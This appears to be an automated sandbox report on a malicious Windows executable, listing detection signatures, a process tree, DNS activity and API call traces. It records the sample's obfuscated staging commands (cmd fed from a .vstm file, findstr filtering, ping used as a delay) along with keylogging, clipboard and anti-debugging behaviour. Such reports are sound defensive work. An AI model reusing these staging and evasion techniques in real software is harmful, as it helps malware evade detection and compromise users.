Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Tt843YGUx5.exe

Overview

General Information

Sample name:Tt843YGUx5.exe
renamed because original name is a hash value
Original sample name:0d6bbe5907ca581fec7c452793aa1257.exe
Analysis ID:1610406
MD5:0d6bbe5907ca581fec7c452793aa1257
SHA1:103b6e60ec864afc723f9fd0f8c29f91a0fcc4c7
SHA256:a1734a3cebd107003588c3b860dd235827515439325aa5bd07dbe3e798cd2e48
Tags:exeuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Tt843YGUx5.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\Tt843YGUx5.exe" MD5: 0D6BBE5907CA581FEC7C452793AA1257)
    • cmd.exe (PID: 7008 cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7104 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 7156 cmdline: findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Inebriarti.exe.com (PID: 6164 cmdline: Inebriarti.exe.com A MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Inebriarti.exe.com (PID: 4192 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com A MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • findstr.exe (PID: 2200 cmdline: findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Bonta.exe.com (PID: 2032 cmdline: Bonta.exe.com m MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Bonta.exe.com (PID: 2104 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com m MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • findstr.exe (PID: 1440 cmdline: findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Pensiero.exe.com (PID: 2196 cmdline: Pensiero.exe.com E MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Pensiero.exe.com (PID: 6496 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com E MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • PING.EXE (PID: 2496 cmdline: ping 127.0.0.1 -n 30 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Tt843YGUx5.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: Tt843YGUx5.exeVirustotal: Detection: 31%Perma Link
Source: Tt843YGUx5.exeReversingLabs: Detection: 44%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.1% probability
Source: Tt843YGUx5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409054 ??2@YAPAXI@Z,FindFirstFileW,FindClose,0_2_00409054
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00403186 FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_00403186
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00402A8E FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402A8E
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00402B9F FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402B9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_007C494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CCD14 FindFirstFileW,FindClose,5_2_007CCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_007CCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB494A GetFileAttributesW,FindFirstFileW,FindClose,7_2_00AB494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_00ABCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABCD14 FindFirstFileW,FindClose,7_2_00ABCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0043494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00434005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00434005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043C2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043CD14 FindFirstFileW,FindClose,11_2_0043CD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0043CD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043FA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00433CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00433CE2

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: unknownDNS traffic detected: query: OreSqbuLLIH.OreSqbuLLIH replaycode: Name error (3)
Source: unknownDNS traffic detected: query: NiXfPuxauHolCHyB.NiXfPuxauHolCHyB replaycode: Name error (3)
Source: unknownDNS traffic detected: query: OEEMOUIIEJHDT.OEEMOUIIEJHDT replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_007D29BA
Source: global trafficDNS traffic detected: DNS query: OEEMOUIIEJHDT.OEEMOUIIEJHDT
Source: global trafficDNS traffic detected: DNS query: NiXfPuxauHolCHyB.NiXfPuxauHolCHyB
Source: global trafficDNS traffic detected: DNS query: OreSqbuLLIH.OreSqbuLLIH
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000000.1685542446.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 00000007.00000002.1753768535.0000000000B19000.00000002.00000001.01000000.00000006.sdmp, Inebriarti.exe.com, 00000008.00000002.2923052469.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 0000000A.00000000.1689206168.0000000000B19000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004083CB SetWindowsHookExW 00000002,Function_0000839D,00000000,000000000_2_004083CB
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_007D4632
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_007D4830
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AC4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00AC4830
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00444830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00444830
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_007D4632
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_007C0508
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_007ED164
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ADD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00ADD164
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0045D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0045D164
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C4254: CreateFileW,DeviceIoControl,CloseHandle,5_2_007C4254
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_007B8F2E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_007C5778
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_00AB5778
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00435778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00435778
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004054200_2_00405420
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040A8400_2_0040A840
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004138210_2_00413821
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004189E10_2_004189E1
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040A1A00_2_0040A1A0
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004182000_2_00418200
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040EA300_2_0040EA30
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00418ABB0_2_00418ABB
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409B500_2_00409B50
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040BB800_2_0040BB80
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00418D530_2_00418D53
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409D000_2_00409D00
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040AF000_2_0040AF00
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040AF040_2_0040AF04
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0076B0205_2_0076B020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007694E05_2_007694E0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00769C805_2_00769C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007823F55_2_007823F5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E84005_2_007E8400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007965025_2_00796502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0079265E5_2_0079265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0076E6F05_2_0076E6F0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078282A5_2_0078282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007989BF5_2_007989BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00796A745_2_00796A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E0A3A5_2_007E0A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00770BE05_2_00770BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078CD515_2_0078CD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007BEDB25_2_007BEDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C8E445_2_007C8E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E0EB75_2_007E0EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00796FE65_2_00796FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007833B75_2_007833B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077D45D5_2_0077D45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078F4095_2_0078F409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007616635_2_00761663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077F6285_2_0077F628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007816B45_2_007816B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0076F6A05_2_0076F6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007878C35_2_007878C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00781BA85_2_00781BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078DBA55_2_0078DBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00799CE55_2_00799CE5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077DD285_2_0077DD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078BFD65_2_0078BFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00781FC05_2_00781FC0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A5B0207_2_00A5B020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A594E07_2_00A594E0
